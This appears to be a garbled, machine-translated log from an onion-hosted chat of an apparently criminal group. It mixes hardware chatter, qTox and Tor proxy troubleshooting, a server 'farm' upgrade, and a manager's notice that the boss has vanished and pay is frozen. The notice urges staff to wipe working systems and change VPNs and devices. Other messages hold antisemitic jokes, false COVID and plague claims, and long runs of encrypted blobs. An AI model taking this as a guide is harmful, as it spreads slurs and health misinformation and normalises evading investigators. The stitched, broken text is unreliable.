RGdb0F8dnWtGQ93V4KP7YzLZhn/Q9w1fzsY7GrQCguOjnRDWPtYfJGT+aC07XT07P84wyOgLQSBsWFmbHDrH3sTJSUbntiL9lahea0NCL2OP9k7yEWEnz8ljtxyAleQKUlrkFY+MthESg+OfAqe0TduVTMB4JbfWhZzCcdPraBMbVZO5paLU2Q2vImuHJG2AD0BO1MVWCetBRcQ4PDFeIa9K9OPHM3OMnKDFk54Ws/5FvDH+eC/ZIqaiRaCRxgfBsWOzdgZ96uIS4ki61a68afMAWJHjs/6kCvsJzJYaEDi1rSWCEp5G8lj77TqXU70fHlWfIQTDKH"}{"$binary":"3cZ9BHzMmzkbQIrw1iKNUBOLLi60t8Fqo82Th4TZJoVliklLUL6krhoFdz8VN7wjIw2/oTWouGi4I64RoCwGu7mw3kVWx+ZmcONwhmKTJ7dPR0L+VLzgIFHDklsCqIHZr5mfaTAj5ZwxXfltvBXyBTAjOw34H4p9bOBsI0ZCyq3nm7bs9hYYU3kdbk7gwMWNl00nA/yfRFedbatnyFDM8irO4BBi"} more likely Most likely the mac was flooded and there was a short circuit, as the vid burned out in the concession now they are more friendly, the whole apple system ne, the mac is good, I sat on iMac for a couple of years sitin11 put)didn't like the system and how?i would rather touch it in the toilet than touch it and i don't know why i bought the mac as a cradle? i remember playing starcraft the second time, maybe the mac was good enough? and what can you do on the mac? i've been burned out on the mac, has the RAM burnt out on anyone? and the RAM can break? well, corsair micron is stamping it out. I have the RAM from them for 3 years now, without respite and ssd, plus on the operativku warranty from sitilinka caught lifelong) Lies 4 more boards of 16 gigas for the future) Micron inserts Asus in the budget notebooks. And micron turned out to be faster than the bought adataoksimikron? micron seems to be normal, hunix already xza as micron and hunixDa now Kioxia, just learned xxx bought likeToshiba like still doing? and does not samsung makes chips for all:Take corsair)And what's bad Intel? Chaimi XPG GAMMIX S11 Pro - TBW similar to Sams and the same 5 yearsI have two Plextor are M.2  I do not know if they are still on saleesams no longer the same)yes, I understand, it's beyond competition5 years warranty give and adataU sams TBW was the most normalSamsung on availability promise 150tbnee, I'm already broke my brain these vinoints at least Kingston? all jerk on samsung but the price is wild, if we're talking about 980 Proshku, to PCI 4.0na adata yes not good, no other analogues?i don't know i'm not a fan of samsungsumsung ponts) my head is all broken between samsung 970 evo Plus 980 Pro or not to fuck around and take ADATA xpg 11 pro ?! guys but is it worth the trouble to choose csd nvme ?))) he also has a nickname Paul Derevyanko and he, fierce tester sofas !is not the one who works in furniture and checks the strength of sofas? thank you, a good toastmaster and his contests are interesting ):laughing: aha, for Angelo pour work Woodmanata want to take all the place alone there! HomeVideo? @elliott norm git, I poured almost 2 gbno terminal at least have worked so for a long timehow I no rekvestilnu and in the browser is The change you requested was rejected.ERROR torsocks[5019]: Connection timed ottiz terminal just do not understand what the error, from the browser 422 I opened normally, but the git still lying in the gap and I mean the same thing, what else is on the error@weldon You are using qTox version v1.17.4. Port 0, does not crash. udp/lan = off; ipv6 = ophosthost, now changed port to 0 - does not crash@xander crash because of the portana setup *qTOX* (ip/proxy/port) are in `C:\Users\user123\AppData\Roaming\tox` - for each profile separately - in the files *.db, *.ini and *.tox in encrypted form, to change proxy/port, I need to remove/rename profile1.db, profile1.ini (profile.tox leave), now after entering a password qTOX does not pop up, you can go and change settings@weldon well proxy it certainly knocks. Checked kst put socket 127.0.0.1 and port 0. After restarting it will not crash, it is not the proxy.@xander does not work[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=DCRABrrPeYvT8vpDe) Run with parameter
.\qtox.exe -P NONE will disable the proxy in the registry look for@weldon you have the wind, I do not know how there, look ini file which lies long@rocco in the already created can be changed (settings are not available until you enter a pass, and if you enter - it closes .qtox.ini doesn't have any of these settingsFix port 9050Port=905050, how can qTox be connected to tor (tor.exe is running)?
Proxy type = SOCKS5
Address = 127.0.0.1
port = 0 (did not change, maybe because it closes after restarting and entering a password)+ all geet - onyon not found? good morning + geet lying? excellent )@demetrius, if so, remove from the announcement riponly, maybe who wants to write something@all let the message hang, do not write anything@all
Friends!

I sincerely apologize for having to ignore your questions the last few days. About the Chief, Silver, salaries, and everything else.
I was forced to because I simply had nothing to say to you. I was dragging my feet, screwing around with the salary as best I could, hoping that the Chief would show up and give us clarity on our next steps.
But the chief is gone, and the situation around us is not getting any softer, and pulling the cat by the balls makes no sense anymore.

We are in a difficult situation, with too much outside scrutiny of the firm, and the boss has apparently decided to lay low.
There have been many leaks, post-New Year's Eve receptions, and many other circumstances that incline us all to take some time off and wait for the situation to settle down.

The reserve money that had been set aside for emergencies and urgent needs of the team was not even enough to cover the last paycheck. There is no boss, no clarity and certainty about further matters, and no money either.
We hope that the boss will appear and the company will continue to work, but in the meantime, on behalf of the company I apologize to all of you and ask for patience. All balances on wages will be paid, the only question is when.

Now I will ask all of you to write to me in person: (ideally in the toadbox:))
- Up-to-date backup contact for communication (preferably register a fresh public toad that is not fried anywhere)
- Briefly about your duties, projects, and the Japanese language (for coders). Who did what, literally in a nutshell.

In the near future, we, with those teamleaders who have remained in line - will think how to restart all work processes, where to find money for payments on wages and with new strength to run all our work projects.
As soon as there is any news about payments, reorganization and getting back to work - I will contact everyone. In the meantime, I have to ask all of you to take 2-3 months off.
We will try to get back to work as soon as possible. From you all, please be concerned about your personal safety! Clean up the working systems, change your accounts on the forums, VPNs, if necessary, phones and PCs.
Your security is first and foremost your responsibility! To yourself, to your loved ones and to the team too!

I ask you not to break up my personal contacts with questions about the chief - I will not tell anyone anything new, because I simply do not know.
Once again, I apologize Friends, myself is not thrilled with all these events, we will try to somehow fix the situation.
Those who do not want to move with us on - we naturally understand. Those who will wait - 2-3 months rest, engaged in personal life and enjoy the freedom :)

All working rockets and internal toadstools will soon be disconnected, further communication is only by backup toadstools. Peace, everyone! Jewish: - Isn't anyone going to ask Aunt Basia how she's doing? - So how are you, Aunt Basia? - Oh, Moyshe, don't ask... A Jewish boy walks up to his parents and says:
- "I want to be Russian.
And his parents reply:
- If you want to be Russian, I'm going to the corner and you're going to stand there all day without food.
Half a day goes by and his parents ask:
- How do you live as a Russian?
And the boy answers:
- I've been a Russian for only two hours, and I already hate you Jews!
A Tatar was born and a Jew cried :joy:it is enough to be born the Jew, and you count a member of a secret society and prevent russians from living, how it is a pity that I am not a Jew, not a Jew, and a liquid favorite blazelensky - you are russophobes, Brotizhimn ukrainy will play on VVP's nerves) so he will play with his dick on the piano, it would be better if he played with his dick on the piano, such a joke would not be appreciated by the aparthotel and it was not the palace, so the palace will be zelensky's palace soon, they are already going to Georgia, through Krasnodar what do the Ukrainians have there? Have they taken over Rostov yet? It's quiet here. Now it's normal + cooing. (Wow! I detected that you have 24 CPUs. I will not autodetect any more than 16, though.  If you want to configure more, set NumCPUs in your toggleSquawking does the toad lie or not? )[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=d66ydvhY7Qc28J9wo) right?
¶¶https://www.youtube.com/watch?v=41deLpbTcaw ¶¶ So is my toad lying in the morning ¶¶ ¶¶ So is my toad lying in the morning ¶¶
@all I'm saved in the steppe, I'm on a dashing horse, who's not there, who's there, who's not there?@all stop спатьeyJhbGciOiJBunq/LOoElux2IJThx5u5iITBkm6cO9pSWOpcepu17XBX1viVAjJ/9VqXTXLrYKcD5xXw/L2GymYVJRfyjPLuz6CZUivk2ZvrUN4aGb8yTABlTdLV1HDQtscsRNY3WiGG5kN+aU/FpGbtDdBnWyIuSKb20rVis/IVKpnvz6ds9/8=eyJhbGciOiJB/tJ94iv9lNv/gA6qJgKzRhZe9f5KDphFqERAvQITVSm7b5PXXxWbDqk62fy3vQXFU+iBCX5pIMk8EM3bywYHlZf5FmNQ010rV5vKrIYiX2Bhx9YldHEcfXKcuv0m5UgmjgPFL0++EZXY7YQ57F3B6d1h45dPJrvv9+maXVeGOFQ=eyJhbGciOiJBFpt9yw/tnzf2QseP5xA8zos1bmx5ikAQaD7PX82cY8CPx+ErU6U0UGdeedviIGQdYt8sIgdEJJEJRhL5OMbA72xqTt5wiz2IMKIqy7IG0l5AJGLbDIGzlS08Y0M2YETTYzoRffMaeESYsaGzjswVmf68HNHUSP5Q1NKk0z9hoblYW4rCvIAqydhkLqfyT0z1v7/HD+HMF86SP/TLtOmVtdEGOQmCB22jT/DQpAbiQdc=eyJhbGciOiJB2CrWNhOJiKw8ceWq+60lLMmmbw/XKuXuKE7Ia/FGMm2GwN7V/kQ/Y+FSXNIfWOp6Z/X/iEY/d1ELljbhCSgqhx7B9tj36E1URtGesSeXDvVDMiSmJlckX0tvKGm0fLPWMzW46MlelaPdc+SzwuWEa1WiVs6q/tLvjlFgzDGpbau9BR+AWeonElj75/UCbMVneyJhbGciOiJBaulF4HpV5j0rFe+YX00PmUydo3Y7AY4QJb/XmutxSEufWTj/SMkQ7VReeCDqSMbj9B6vicsEoXqp3cAoI7qFphgVJsAnhHcWOAtCM8kRdepc95F5vZK17JCk2A3u1LDHTQnDxIepKoZB7tj8BlnuvVi3r/00rKxeP85myqC9zrI=eyJhbGciOi all reruns{"$binary":"JR4KMzdn3aXa7d5gMJuyyJyYooyigqCXRq4Wz1loIrj7xdYuPB7NODboYG1wyl6IKbomVY0yMhJzCtHMnZ1B2z2ONoAayi4lwtRBwWpz1N0ZaPFt17CAgUL7jM+ycXwgcgieH7hiBQ1l/H7tU4ZME6SmVA2P/FhaVLIM6FgMTNqWWm/j42kBYSikN/srJXL771rtJUc9dvRDKTjuEIdD88bPYmD8iYhtS2F1I5b6bNY="}{"$binary":"PynAnSop5YMWqfQRCgwTKkXy8+jNiXVglVj0E7d0XK+Ybaw4G0973LyeLjJOIcsQAuyUNox6YheVMDQpsJQCgUuopPO2D6aqHBTvZScAHbiX4gJ3bpuG2npFl0FgrT8fBRor0MMydahxsbxZ31G6el/9xIYgiR+Aj51YI0SbKfToplbXXRio1BuNC5QSrjTNX5EiJYXW8OIRTHxxbS1I8wqcXo1g65Q/2ecEBrd8t1Ep6ILfDD8b2clV1EZcYWJ0zFJ8XfkSSeee8Sf1BZrbsE+tXabOwpfmVYKuo1TBO7ejdME1/HvZ+XSHDw=="}{"$binary":"sEKZhQAf8PGedd9phyAbebJyUbqp1/celsrTGr57XG0VngDytkL/C4JF1w7AP6NXwXG7aj2BHEqgwheiMKpnr+HMvmm8jbf1fUfB0/+GkGLp8K7gaHEIX4c0y7p+8V4HJZ66grhgNJFGpafShLa6yGXknBGzcty14KM9TQwySpWtOyU1ROx5gkelz1XGLBNvjlibugi/dhL4ONgvIycdINiMCO57IEKJ48wJhXKni0Y7UexETgeVLLiOIqtnlaCZh+wvxHa4v5Pozf2602FuaUNV4jepQWpmnZWjcwNWNDODqo8JSQVaJzAJkEQ1DIaIj9wXfg0="}{"$binary":"rtzYYflX+e/kTzWwPjHR+yri+X6Cfvik0e8B0PFkA1AbdS8xQr3v2ub4n07h2xCpzbriKhkmfdySm5ydU/HS4fPPIkhIXT7tsXLCdIgNMB83JD+LzSzAJkCgTsYsO+7MtPm+TjObc+ipNETvitAcL4hlKY+eqmFzog8CXIMGtyeaLLL9pkry5TnFnHrwheTv6FjyU9ZKrJ3i61vH+QLF2SBuY+m5bNz6FpUo"}{"$binary":"6snizd0jgFpo7J6F5TJA1z1eoyDxn0768V/JPavCyeTA7eR2bR4SoO8r0Yk5iXZgI3rAKKNvsl3xEMc2CRHL85bhkbmRS8ubOoPfP5/0/fA7xRCDFwOMHKB2r5XqHZ9D5jmSQAsSxwaG4dnuTIZ7w+oqLZSKsue6sTFotUiqdmAWg0VvzEjxqc6sR2CCT+Tk5bbKTDI6TCCB4YkA+mjLc26xaaqTMGMPFdmLufsl2mIudbT/3OXia8DLiKnu9Qi5ZD1iO79ccO0iVF/4dqfVhC8otMP5PMebDWHmLTP/yDbCn74zau7rC3phcB+J5KZgiNsT8UFCoGo86hoO6fucpakZCYM9m8XRwjgKQSljlQ=="}{"$binary":"5GXURY0IPCACGV6Oxs09F9Yv41rjIxSAjtD982tw7ZFKGywCBA37/gcNssSd89u+6vQVpiH6apkQbm0kQZt/rx+XFOrIL3EHF6eHacQ7QCy1zdeEFEHy411WfV3ohEhCFv1bsJCDhXnX0mGvUb/B6tOj6Kzxpq/PP15NrS6iDi/1HA5imsfsJnItfbW9zmVBc9weUz9Q1jid3rRfvhE7K0+4GUd7ApCypRYuQMTKIXBmth6IRU+hhbHF34QHXfytw54COArQLfhx+2vZXNI="}{"$binary":"j2zjcYV/CNfwn67PTmSKeFfsrLil008z+7whPux3T3uHlawlfyKJrSzZ3HTV6RKvwJ9+vrQypDdn7nqzoSQycVeGNrZHH77bjMXn2vb7cnoULMBzM54fkPIhjy6SPuCtO7qM+KwNeMo8dS1hKM4ddXmhe/QkKL8ZlUEy8PboUFmpgSaG3ee6xJ6uNjqCO41Wr4R455yS3MNnH89l116pVGoaajdUkSuLQi3kXAlQH9O0QaeIeiU2sA=="}{"$binary":"QiXPJ10VWvntpBZpXa4VPTXqvyE6E8oz/NvKrd5MULOTU3gqPVNQXuAftTeBSTEJv0PSmAqPCZAHrczFOXx6mgHJ8bsyKG3u4x9ny/PFakHu8D2Kok6KHLfBZ6OGfHenUEb9HTSGPlqDsU5zBP0HFXROnkFn2dgSQXjVh4ibVxBwmHriJDAKykCfUn+53/QtDVMPfhkVOpE3PF2fDqsR8w+RNUvLUV6/9hiTgtnoWw=="}{"$binary":"9GihTXwtjjx1IS7g5z31S7D4fXGpFu2E5waIdDbjptLSz/OrRUHd5PLQFoDmQnugIgmMU8O1ED3cTdyzhWFbQD3LKrj1Obl07LITX6XC4JsUzULaDCaZUvM/N8+loSOobfNbQk3ZMkVyANWaoG2li/KZ25lcwcZ87WdWJhcBK3NTPYZQ4oGsJ70Tdo9ZkHPbE5ACMzrToEj+Nq/uRrF+IXYNVKd5whdPCBgH9tWxgw=="}отрeyJhbGciOiJBo8X3LI6o8Py02yUXIteOAtTWpUEYGxLJfGDuKHQuz/ywqfGJWcGeqSLAwcReh55KMElJdW7rAc6YJHIjOAgLfPy/ZBiO//FBHv1s9iNAuQlf7lN0QFoxreMAsi1hifZaFVF3YN5fLGBMbgRhJDN0wggegDMci6v/BCF3+zIEQbRE3WUOewag8wuKYFiWZREMeyJhbGciOiJBKmbtWkCpUZ9776ODJusTAmWHmZejo0uzovblqZQhEwA7HWVV0GfistCB/h7jfHbKJD+mazUyAtpzcyFCjWFKOvWT/rFpg5o5LE/jOPAT7zwcI/7M1y55V6DqTw/+REXF8EjT3ycvcAkkO4wHeamzrsaAJwLU6tiUlDvgxP0vTCE=eyJhbGciOiJB3wFH55mGTSP2qnOBNDkbLSc/ZVxmKxAyM5gae5ZumZ1eOcnJhz063ILLexPYh6jk4gwGkyMwl/4U5ZhJmLt3fkc+HehS8F2bQSXY0VtpoG2Ev983Grg9lSdbbohZsZxE1j2FxjgN9wPs1P/+bFfU7fDQi+aonk+0MZp63QRpzsAy6cKYIAVF+x7BzjGZhVNrZ0uwezD/wqgMDNC/qPFvsrFPanWMqja4/fo/G8gDFeYxpYgN4oFOSu/gnQKppenWcwgpPolOA4MQUEEKdBgc1BoB1P5/yeyzsjxCxvQFQsE=eyJhbGciOiJBjxTKgS1EgNMl/7CpmVvEuZj8Vh+2tremr077dk+J4ZehBIaB4y4WtnUxu0zZ+OU0KXF to all of Gator's neurons !@all proxmox keeps working) yes, it's hard to understand how to make messages here, it can show antique times but hide the latest, and you think "what?", but the date is old, it won't be ok. I have lost sound in the chat, notification
the farm, we are testing with gatortaki can operate the farm? i took your old message as a new one at the expense of vm)) something i have a chat in the middle of loaded :zany_face:yes, i see the machines are working there@hammer already sort of pro-apgreydilita same ovada will not izomen, well, this question google 5 mines further image will be used here on the Virtualbox what is the difference in them?as i understand get iso image instead of ovaPreport to OCl you can select Include ISO image filesTemperature LED 70-80 degrees) @jaime good stuff, but there should be a pink glow. I have a samosadTurn off all your cars, after who will stay with the rights himself will turn off all the proxmox, as it should not suddenly@mitzi and counting down to sleep will the farm machines? @jaime soon New Year - need different "lights")) I have a lamp for seedlings blue light, there are a lot of multi-colored diodes. Suitable? I'll tell you more, you need a different spectrum ... And knows the technology), and found out who grows) may be under quartz? need another grow) under UV lamps) AMD Epic is much more humane than Xeon (at least for mining))[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=zt4ZtPo3oBP3r7zDQ) Something costs a little bit too much:grinning:but they do not give anyone, not even me))) funny farm )Mitzi grows marijuana bushes, Dimetrius grows coca leaves and gator trying to synthesize ecstasy there are many pitfallsTomas we grow it), I did not give@mitzi I see, listen, but really build a server, say 2 processor EPIC + 128/256 RAM and rent in the arena on the net?What, you don't have enough RAM for 128 gig? And how much will it be now? DDR4 ECC there increase the RAM, but there should be one more slot to add the processor, too) I Hammer, Sledge Hammer )@mitzi increase that?) or the quality is different?  ESS tamobedit that not long before how long? @all Clarified on the upgrade of the RAM on the farm proxmox,
work is planned after 18-00 Moscow, the farm will be shut down.
2
3 ``against three reverse apostrophes? one ``two ``three ``
TEXT
one ` two ` three ` at the beginning three and at the end trichet doesn't work, and without vars similarly `vars:`
` nodes: 2
``
`- include: vpnout.yml
`- include: vpnin.yml` Is it every one? It seems that quotes with any number of lines can be restricted to ``lala``https://docs.ansible.com/ansible/latest/user_guide/playbooks_variables.html``there every ``
line needs to be `.
with ` apostrophes.
)Here every line should be `apostrophesIt seems, I closed it with reversed apostrophes, but it still does not help.I understand)Yes I have an editor, it's chat formatting eats up.A well if so, then I unfortunately can not helpEtoby, I am aware. There above in front of nodes: 2 two spaces may be better to use any online editor? There put a space or indentation - all broke nahreknna as I remember, yml files are cranky to formattingFu shit, wrong chat, sorry. Chet how not define, still says the first - includerocco do not tell?
  nodes: 2

- include: vpnout.yml
- include: vpnin.yml`It doesn`t work like this, it fails:Ansible question: How do I define a variable in the head YAML-file? @all Hello all, for those who use proxmox VMs, today I plan to upgrade RAM, which I will inform you about additionally
please close all unused VMs, otherwise there will be a risk of losing info after farm shutdown.:vulcan:goodbye to all vindas (it's the new tor, ahaYour tab just crashed.
We can help!

Select Restore this tab to reload the page.
)all this istoria :)https://carding.pro/ru/v-rossii-nachali-blokirovat-brauzer-tor/https://carding.pro/ru/sotni-uzlov-tor-ispolzuyutsya-dlya-deanona-polzovatelej/xanderthx+thesetjabber up! where is even one admin? huGhurD toad=) i'm in a fixD @neville crypt waiting, answer:D@neville drunk or what? give the word but will they approve over? i cancorrche you tomozavy i teary-oh return me my 2004th however is it sad? - no, it's sad) no toad, i'll go pee in the piss, i can do everything, thanks to the toad, who's the toad with the docks?)
hash@ does anyone know?eyJhbGciOiJBk4dBLDFD8rT3uWG8FLvV9zo1JOIEqApm5zaqir+5bqeWKd63y+9wvDD2Tu5hoWLPtk6VqnmsUQKpw6Ln3wKWNhBplIaKjh36OhJvFj49ns9D+21icCfkNzQoJ5CVLB2ID/O88QT4ZuCcGqv7RhUAYTr1YPsAWcZbsCSGhn9h4JPgE7IJH5UcoeXO0RlpE3D6eyJhbGciOiJB2jXV4fZgcQdq3okmaaovfHOpcDR+DXAVEwJCqyNBhsYIKILhpYteBtmYKxkMuXymh8uZEbIq3VjrUBDAZ4EX+lns/eK9yPll4qxt7CrPFJ/tfisN76GW8KE1w+vMiHqsEaF6bb8sVg5q+b4bucf3hOy6KTLUVOp0Ps3I88lahN4=eyJhbGciOiJBo7behKQIJNbJFUgeP5fWkUVt7t9QXjxagxGcFlAZEVUQb6Ia+ELfTS1sOt4DjlYYVrMM+ejFL2S/0ndD9PfoJarmlxl5bAxScGeBRKikI9qZ0vLz01pQKDsy++iLsFURAHTCdlQtziFdqnd1W/ORVTYTMVULAvTKJW7WxROGvyE=eyJhbGciOiJBLhRDe3K9xEtGZBbpbPw/mJxowOemfPENa22VI+sbnsK8txxC8slUe7O/N/5N0za3HeF4rphNdlDGV/Ia6Be0sgCo0PtDLtuW1Glnj5d8blnfOLiT2wJInNG2m7qmG6tTawgmbpURetyjUhO095+JbZUkWrGSJNf9YkkmtuQm5dM=eyJhbGciOiJBUrEqOqFHtxDXz3m4+RTv8Y7G8er5VV7vEEdbkfctuH/IsRanWg1sb9G1a6nhrT7wWpMUB87U62qWxtoCjvQsvJJXa/gD2SusLGh6Z5LXH9hXLjC87pj+CMqORdT/tbtpjnOui9pDoJgLuVDyWp6aq0n1N9j4t6BsCnCaJrWOrow=eyJhbGciOiJBwuvrvh8HAecrvhXE/ezZm8hQZFbt9WT6HbApxo4VklSewqE9+jDAYDuZfpgUaj3X7Mc4gzcR toxe messages only come online, mattermost is a good alternative, they're developing nowThe last I heard, tox is bad with group chatsThere can be group chats?i think they were planning on switching to tox... what do you think about that by the way?fuckin mastday))) funny I had 20 gigs gobbled up somehow shorter, there's a memory leakageThanks for the advice, I'll try to restart it if the problem appears whole two there is such a process in the details section in the taskmanager videnschya look in hacker taskmanager also kinda process hacker and process explorer viden restart it through the process explorer it does not show up anywhere?I had this@homer in dwm.exe memory leaksnu and plus otr in this version of rocket requires confirmation of the start of a private (encrypted) conversation from a contact. this is - yes, not convenient otr does not work simultaneously with e2e, pay attention to this. The green key is e2e enabled, if you activate otr in the conversation, the messages will not come.If it doesn't help, i'll fuckin' tear it down and put some Centos on it and i'll talk to it by spesh, i just forgot about it, i get it, i'll look at it in 2 days :) look at the resource monitor, there's no virtuals on this system, is there only wine 10 and torna?I have now put the latest updates on the Windows, maybe this problem will go away I wonder if anyone has had similar? i have a separate system on which runs tor (bundle or whatever it is called) (well, it's like my proxy), this servo under wind 10, except for torah there nihren anything in the process of working this servo gobbles the hell out of RAM, under the user under which runs torus gobbles 200-300 MB RAM, but in fact over time will eat up all the fuck up to the inability to connect on the rdp and reboot only through the button, in the task manager does not such processes that gobble up fucking memory, there max ~120mb at the most voracious process, but the task manager itself shows that osu consumed by 99%, all osu 8 gbyes) well, he and the general) well, except this channel) of courseThe data in the database of chat stored encrypted?But I'm used to it)) there is such a thing. I have about once every three days 1-2 errors.
And so, almost with all communicate through the OTRNo it's rare and confirmation of apr just strange ... (that wrote, who wrote, whether he wrote in general or it's all an anomaly, it's another mystery of the universe not often, but sometimes see the counter that there is a message from a contact in a private, and there is nothing)Demeter, well my experience of using otr here very deplorable, constantly flies off otr...I blame the torus itself, but once every couple of days@alik how often, just honestly, OPP do not come or give an error? Installed locally, all encrypted. In rocket chat, messages disappear or do not come to him@mitzi blab in ls> Mars -- this vpn dual-ratisk neither this nor that -- this is our internal officeSupported! I will exclusively praise! I refuse to cocksuck) Understand brodonado understand and forgiveI hope everything will be tomorrow Hello! Salary a little delayed through my fault :) My bad, you can blow me away all the chat :stuck_out_tongue_closed_eyes:yeah, thanks

https://play.google.com/store/apps/details?id=dev.darwinsoft.marsvpn

this one?

Or this one?

https://apps.apple.I have added money beforehand, but it didn't work, so I had to press the renew button and it didn't last, although I checked the checkboxes in the panel works марсeyJhbGciOiJBG+alG6kcHfbZxzNic7P+8+/g0dsPMWJVkBg0kEgBvdmvi9so6gJmvstRAVQlPuMyIT3bdsJ5MIzWYNLAzYFOP3v+on+KNaXoLyY/fJceBjpVtpQtpjTdETgynVIvF7qEQeWWqTtj80biXftgvHp/gP33juiUWNIYGZqJqWDmsxQ=eyJhbGciOiJB0tbzBwngYLuhrALSUbsvB+yarmN3gyqNLfd+C/QTYbMfs8yDDJmpr3X2Bu+bDLm1lWmFahBtPqnxGuzTm2bhHuDsToWhaJeM/fEkibn/SkdQEgD7lgrTc7BswBQklDKeULx7kGTjIrLu8fM4NgqTydyZkUjx0W7ZT+eY+FRdZpXsM9iOFaOAZpAdcf8CwVSpOVw82dRp7XuGHZz/xTuQrA==eyJhbGciOiJBLnq+nET9LdC0wVQnegrsG1FgtIWSdGs2kqqXS4v8otc8G0N279lNxLh24VfjEQrMmoDVKtuFUagiHcu/8C7xW60pQ4fZwixi5pCw1a9TixSzlIyyjknkBuaVKh++KUJvw9GO1UZM1mnxa9dus/DnvLb6x2TYRwq/CRWAKjC3IZuSW4M/0YRBXlTNqK2wa4S2eyJhbGciOiJBkuQ+OZ+x094ZzK9EFsJrdTRx2lL8pSmpGpVk18U+JwgjVezf5o13HU+CEVi6yhxji6CZ8SO9xkT2zSVV5aUwBAu7wEIC7S3nRpTuJ/lk/lLoXm2K5IDqXbz1rw8a7NY8+kFHJIQKGvq6Rz5Yak+tYW+EmAJssrpv/FFmJVtADPGoiibRLOChpw0nlU1N2QtQDQ+8g8TOrRqAtwz/NjFWAG41ALI7H0s9KheYYbrhJUM=eyJhbGciOiJBm21fDpAOTS9BnU4OMmlnI6K+qTAMK3RgaZ11jw8Iysz9klKO+KZtPItBT6RhQlqorfjw3sqdtmv/GQjn2RA+aRRvCtS8veuCIMHe8ysIVKzeqVM+iN9jGKByYjaxxFAJQ+6z2ej6qm+4Have you heard of the HackTown forum?More specifically. they lowered the pandemic threshold to 1% (if i remember the numbers correctly) that's the point (for a pandemic you needed at least 5% of the population to get sick, and it was only about 1% they fudged and redefined the term "pandemic" itself before the "pandemic" itself, to pull the owl over the globe to impose the term, it looked very strange that year, when the WHO began to use the term "pandemic"-that's for "cattle" bullshit-the epidemic threshold is not exceeded, according to Rospotrebnadzor itself, so there is actually no "pandemic", according to the classification of infectious diseases....and they blew up a "pandemic" like crazy. The coronavirus has less than 1% mortality, and the mortality rate was about 50%. Although they bought vaccines in commercial quantities back then. So they didn't get vaccinated. Doctors quickly diagnosed it and suppressed it with antibiotics, azithromycin. By the way, there was an epidemic of swine flu in 2009, but in fact it was the pneumonic plague.Cheto interesting) look at the trailer on youtubey today will watch "compartment number 6" happy end - this is our movie, 8 episodes, half an hour + "movie about the movie," I still watched 3 series in the spring - when I bought a TV wink free was, Recently, the remaining 5 finished watching (wink free again)I found some frenchwhat's the name)neapoznite very interesting movie - about a hacker-programmer and novice porn actress)Maybe finally the markets will start to take bitcoins, with the same qr codes) good morning revolutionaries){"$binary":"G+/8MRgwUBMCB0XNP+YsP9RFwhrNSlgXPGk5ihGzEnSs81PI8b5PtpweVQWTg68DkRCu0m2X0586WQ9KCjaqSan+VU5gUEJftt4pjobCiOlNTplqmi7Snrv1bwL1ainO55Pg5x7tJkp6hpewvy3e7UKzeJbcRswI67NHh/LnnnN70VbStgo2tQuJca3HYW2hgDC/gle0KKGGn/iiCfREDgZrtmJTb8mwo1HJmQP5SF4="}{"$binary":"/5JT23N6Fg+DK0JNXZ5dm8mV35Z5cURidbt/gxCT2vOmTqdMjCGmvYANH/4HFz2RUQflZRGCWUvs7sUOvligHySkRvU/QpZ5sKrp0+fZyo+3gK9rEJ/rQz6FBcyckpM+LMf8x1GCtfcWLq0WcjdvvsbXQ6Okrf+o9HVhAn1RuYzk8Pwa1JTn0/G/LXSMssin3Ydaz7pjy1567PR6KAwYbDy26NXuTzWSPQVczMbT+v22Mo0wv2bsLKKrJGgFOxX58op/pfhZrka7UfJBbTuU3XFjTS8y/JMmMGhKWnO1CF8DJL0ZTjpAputVLnowmyzlYbF9Kg4yMhBXenaa0fcU0LVXku3PnQ=="}{"$binary":"ibi9iqNDuj5cjYTbXufBB/7qVKMDsbnrwXQjP4WP8o0uGz+ooMzThMLP22SsOZ426lVkqt/d+AeJhBQAwdqjrd4uC+XS+BKNjg3B5ToGiP+9kE4cSkAsv04XCrO8tsQeI1IUko4t+pFJqz+1MZONdRfrhgkRlJSafekcnvYfUD88fzcIuiWGXXJgk0WayuwxQ8PnLT1kFIdHhJexN0cda99GkxwjfM4wrGY0IOhrYdhclkc="}{"$binary":"+P0M5ZKmyIcSeo83XtPTp3F1N9fNUxIT9aj0ix0bNuQPGqBuag93Y5B1XYzrYyI3ayR3ApuYbzQX6Qwze+FP2MOyooZLUNaXlqsKExK74KLtpyUK2Y9aKfpD7X9aSasgw026NRsAQ+RyrT5nf3n7nHmeVNwX0xVtrNPYFNrlgIAjkmXbX+rHod0rEY7SyuiDqp7svPdbMXgpnFq6ONOZ973YxqxycW+JpXEplMCjbIVM/ELQ2ZSxRWQvt6ikjh3UodZzf6fX8TVcPnKI5SE="}{"$binary":"pSAoFIWQU42mS4Q+p/T7dTA5mEJjrVFj/sXvCHEO055usU6NkLM//ZoUw9Tt+j2u2xLGJf/v+fm2KYagdzYLGDF37u1WUAsiYclHg3scN1yK/BpYmQJvJlhB4ZP+ni2sfZZz49x7w6mMvTZ8JcJyKlRgsvJx0a4EleHtEhfbsr2vCVL5EsVIQdOPZhBbADYWD6ma5kwBHh8F/6U0XmrKk1CxgW4edH+yFw=="}{"$binary":"JtHEfaokCnYzCYK0ZiTtlBLnUX85mFKuv3hn/M9o9qDHhFsc2Ktt+ekpwl4ZGHevNqK55+GwuBW8Y9ZApX84/p3FbaLUz6Hdb3z/ERMUQo7NhHs4DjTKnoa79q4OJ34N8SWlp2pa49VIn65rGHNziw11KQnvC7sO/jlKvnZzMDzWJKpPu/N0SqBD3BoKSTqYdeIkmIBxCVZbWy/t/IEUVVsdecOiwRDELypy8UpATvHQitexH5+j0mFlvQ=="}{"$binary":"mlLXZf6MgrQ5PdlVbeg9DuHXz3S0LkHnSBW2NECOMB8uG8IDdk8Fk16AGPRZp7KC+IUMADDLPpJJIRFZj3OWXdBQ4yERpeRBSqAVV9htKYEbnAJ2crViQKslgxWEBr5Nk12umdKUSXO16SwixSjaQrVbUDVhBidF2SgP7cVzsYTzWcV6cRAtZ5TOnkIISDO63vw809ZToDnzubq9LjzHUAgCOBXqDhryjOnzeUGDuItY6T0XX1eoMqCjefJTF4trDrg0uU3RzOk6oFpuVhKy7gq9/v1yjRW+Ja1hCkZDZsYX"}{"$binary":"5axbEzPkwTX1eWc+jyb3Ry7U4Cf/t66IMh1ideI